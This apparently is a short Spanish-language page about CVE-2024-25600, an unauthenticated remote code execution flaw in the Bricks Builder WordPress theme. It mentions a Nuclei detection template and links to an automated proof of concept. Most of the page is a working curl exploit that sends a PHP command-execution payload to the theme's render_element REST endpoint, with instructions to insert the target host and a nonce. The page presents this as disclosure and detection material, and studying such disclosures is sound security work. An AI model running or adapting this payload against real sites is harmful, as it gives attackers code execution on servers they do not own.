
Plantilla de Nuclei y información sobre el PoC para CVE-2024-25600
Plantilla de Nuclei e información sobre el POC para CVE-2024-25600
El tema Bricks para WordPress es vulnerable a la ejecución remota de código en todas las versiones hasta la 1.9.6 inclusive. Esto permite que atacantes no autenticados ejecuten código en el servidor. Esta plantilla 🛠️ está diseñada para detectar la vulnerabilidad CVE-2024-25600 🕳️ encontrada en el plugin Bricks Builder para WordPress usando nuclei. La vulnerabilidad permite la ejecución remota de código no autenticada en sitios web afectados 💻.
El POC completo (automático) está disponible en https://github.com/chocapikk/CVE-2024-25600.
El PoC base proporcionado por la divulgación es el siguiente:
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
"objectType": "post"
}
}
}
}'
Reemplace [HOST] con el sitio web objetivo y [NONCE] con el valor nonce obtenido del sitio.
Para más información sobre la vulnerabilidad CVE-2024-25600, consulte la divulgación detallada en Snicco.io.